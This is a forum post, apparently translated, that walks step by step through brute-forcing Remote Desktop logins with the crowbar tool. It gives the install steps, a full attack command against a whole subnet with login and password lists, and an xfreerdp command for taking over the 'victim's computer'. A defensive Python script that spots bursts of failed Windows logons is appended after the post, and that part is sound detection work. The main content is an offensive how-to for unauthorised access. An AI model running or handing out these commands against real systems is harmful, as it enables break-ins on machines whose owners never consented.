Crowbar Brute-Forcing RDP



iseeyou
02-01-2018, 11:49 AM
The crowbar script is written in the Python programming language.
We will install it on our PC running Kali Linux.
Open a terminal and enter the command to install the utility for connecting to a remote desktop:

apt-get install freerdp-x11

Installing this utility is necessary for the script to work correctly, and also for connecting to a remote desktop later.
To check that the installed utility works, enter the command that requests its version:

xfreerdp --version

The utility responded to the request properly, which means it is installed correctly; without this utility the script won't work.
Now we move on to installing the script. Using git, we clone the script to our computer:

git clone https://github.com/galkan/crowbar

The folder with the script was copied into the root folder (the home folder); we change into it with the command:

cd crowbar/

and make the crowbar.py file executable with the command:

/crowbar# chmod +x crowbar.py

Now we check that the script works by requesting the help:

/crowbar# python crowbar.py --help

This command shows all the information on working with the script, which confirms that it works.
Now we need the files with logins and passwords that the attack will use. The location of the files doesn't matter, but it is more convenient when they are in the folder with the script, so we copy our files there.
With that, our preparations are finished.
We move directly to the attack:

/crowbar# python crowbar.py -b rdp -U login.txt -C pass.txt -s 192.168.0-15.0-255 -o good.txt -n 100 -t 500 -v -d


-b rdp the protocol to brute-force
-U login.txt the file with logins (you can use -u with a specific login instead, if it is known)
-C pass.txt the file with passwords
-s a host or range of hosts, as in my example (you can use the -S key to attack hosts listed in a file)
-o good.txt the file in which the results of the attack will be saved
-n 100 the number of threads
-t 500 the timeout
-v verbose output, so that the process is displayed in the terminal window
-d check that the ports are open before the attack

We start the command and can go for a smoke; everything depends on the number of logins and passwords in your files, and it may drag on for many hours or even days.
When the program finishes, you can look at the results in the file, in this case good.txt. There you will find the successful match, if there was one; also, if you scroll back through the scan in the terminal window, the successful option is highlighted in green.

And now we connect by entering the following command:

xfreerdp -k en-us -a 32 -x l -z -u Administrator -g 800x600 --sec rdp --plugin cliprdr 192.168.2.12

After the -u key we specify the login that was found;
after cliprdr we specify the IP of the cracked host (192.168.2.12 here).

In the remote desktop window that opens, the user name you specified will already be entered; you will need to enter the password you obtained, and the victim's computer is yours.

I hope you find it useful.


If there is demand for this post, I will introduce you to a utility which in 80% of cases lets you learn the RDP login without brute-forcing, in only a few seconds.
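
From the defender's side, the run described in the post (many threads, a login list and a password list against a range of hosts) appears as a burst of failed logons from one source address. The following is an added example, not part of the original post or of crowbar: it flags such bursts in Windows Security events 4625/4624, assuming they have been exported to the constructed CSV layout shown; the layout, the threshold and the source addresses are assumptions.

```python
import csv
from collections import defaultdict, deque
from datetime import datetime, timedelta

FAILED, SUCCESS = "4625", "4624"   # Windows Security log: failed / successful logon
RDP_LOGON_TYPES = {"3", "10"}      # 10 = RemoteInteractive; with NLA, failures usually log as 3

# Constructed sample (assumed export layout):
# timestamp,event_id,logon_type,source_ip,target_host,username
SAMPLE = """\
2018-02-01T11:50:00,4625,3,10.0.0.66,192.168.2.12,Administrator
2018-02-01T11:50:01,4625,3,10.0.0.66,192.168.2.12,admin
2018-02-01T11:50:01,4625,3,10.0.0.66,192.168.2.13,Administrator
2018-02-01T11:50:02,4625,3,10.0.0.66,192.168.2.13,admin
2018-02-01T11:50:03,4625,3,10.0.0.66,192.168.2.12,user
2018-02-01T11:50:04,4625,10,10.0.0.20,192.168.2.12,alice
2018-02-01T11:50:05,4625,3,10.0.0.66,192.168.2.13,user
2018-02-01T11:52:30,4625,10,10.0.0.20,192.168.2.12,alice
2018-02-01T11:53:00,4624,10,10.0.0.20,192.168.2.12,alice
2018-02-01T11:55:00,4624,10,10.0.0.66,192.168.2.12,Administrator
"""

def detect(text, threshold=5, window_s=60):
    """Return {source_ip: summary} for sources with >= threshold failures per window."""
    window = timedelta(seconds=window_s)
    recent = defaultdict(deque)    # source -> failure timestamps still inside the window
    seen = defaultdict(lambda: {"users": set(), "hosts": set(),
                                "peak": 0, "success_after": []})
    flagged = set()
    for ts, event_id, logon_type, src, host, user in csv.reader(text.strip().splitlines()):
        if logon_type not in RDP_LOGON_TYPES:
            continue
        now = datetime.fromisoformat(ts)
        info = seen[src]
        if event_id == FAILED:
            q = recent[src]
            q.append(now)
            while now - q[0] > window:          # drop failures older than the window
                q.popleft()
            info["users"].add(user)
            info["hosts"].add(host)
            info["peak"] = max(info["peak"], len(q))
            if len(q) >= threshold:
                flagged.add(src)
        elif event_id == SUCCESS and src in flagged:
            # A success from an already-flagged source suggests a guessed password.
            info["success_after"].append((host, user))
    return {src: seen[src] for src in flagged}

if __name__ == "__main__":
    for src, info in detect(SAMPLE).items():
        print(src, info)
```

A user who mistypes a password twice (10.0.0.20 in the sample) stays below the threshold, while a success from an already flagged source is the entry to investigate first.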